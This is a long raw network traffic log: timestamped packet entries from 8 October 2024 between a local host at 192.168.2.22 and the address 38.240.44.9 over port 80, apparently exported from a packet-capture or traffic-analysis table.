                                                                                                                                                                                              Oct 8, 2024 15:37:36.536351919 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536358118 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536367893 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536377907 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536386967 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536387920 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536398888 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536410093 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536410093 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536422014 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536429882 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536432028 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536443949 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536456108 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536478996 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.536585093 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.537132978 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.538103104 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.538146973 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540374041 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540394068 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540442944 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540883064 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540894032 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540904999 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540915012 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540926933 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540929079 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.540950060 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541488886 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541500092 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541512012 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541527987 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541544914 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541783094 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541795015 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.541827917 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.542398930 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.542442083 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.542452097 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.542480946 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.542598009 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.542608976 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.542644024 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543219090 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543251991 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543275118 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543286085 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543318033 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543329000 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543339014 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.543374062 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.544127941 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.544138908 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.544150114 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.544161081 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.544177055 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.544218063 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545114994 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545125961 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545137882 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545146942 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545162916 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545166016 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545187950 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545906067 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545917034 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545928001 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545938969 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545943975 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545953035 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545957088 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.545995951 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.546602964 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.546761036 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.546801090 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547022104 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547177076 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547214985 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547306061 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547317028 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547355890 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547682047 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547693014 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547703981 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547719955 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547955036 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.547972918 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548001051 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548551083 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548583984 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548741102 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548752069 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548763037 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548773050 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548779011 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.548806906 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.549376011 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.549592018 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.549633026 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550036907 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550048113 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550057888 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550067902 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550077915 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550084114 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550098896 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550672054 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550704956 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550813913 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550844908 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550854921 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.550878048 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.551080942 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.551120043 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.551512957 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.551590919 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.551634073 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552164078 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552208900 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552242041 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552268982 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552280903 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552313089 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552558899 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552588940 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552598953 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552623987 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552647114 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.552694082 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553292036 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553348064 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553385973 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553412914 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553425074 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553461075 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553647041 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553657055 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553668022 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553697109 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553706884 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553719044 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553730965 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553746939 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553766966 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553869009 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553924084 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553935051 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553952932 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553966999 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.553987026 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554138899 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554193020 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554203033 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554224014 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554241896 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554281950 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554413080 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554425001 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.554460049 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555049896 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555068016 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555078983 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555100918 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555243969 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555255890 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555293083 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555310011 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555321932 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555331945 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555342913 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555355072 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555356979 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555378914 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555449009 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555460930 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555471897 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555483103 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555489063 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555522919 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555804014 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555841923 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555851936 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555875063 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555882931 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.555917025 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556070089 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556082010 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556113958 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556128025 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556138992 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556175947 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556332111 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556343079 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556354046 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556364059 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556374073 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556401968 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556571960 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556583881 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556595087 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556619883 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556715012 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556725979 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556735992 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556746006 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556750059 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556759119 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556760073 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556777000 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.556792021 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557075977 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557113886 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557118893 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557130098 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557142973 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557171106 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557687998 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557699919 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557712078 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557722092 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557733059 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557754040 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557755947 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557769060 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557779074 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557790995 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557804108 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557826042 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557915926 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557928085 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557939053 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557950974 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557955980 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557965040 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557976961 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557985067 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.557995081 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558007002 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558741093 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558753014 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558763981 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558783054 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558796883 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558828115 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558841944 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558852911 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558865070 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558876991 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.558898926 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559004068 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559015036 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559026003 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559037924 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559048891 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559051037 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559060097 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559072018 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559077024 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559082985 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559096098 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559104919 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559134007 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559323072 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559340000 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559350967 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559361935 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559371948 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559377909 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559387922 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559401035 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559407949 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559427023 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559437990 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559444904 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.559477091 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560225010 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560235023 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560241938 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560270071 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560329914 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560339928 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560350895 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560363054 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560369968 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560376883 CEST804917238.240.44.9192.168.2.22
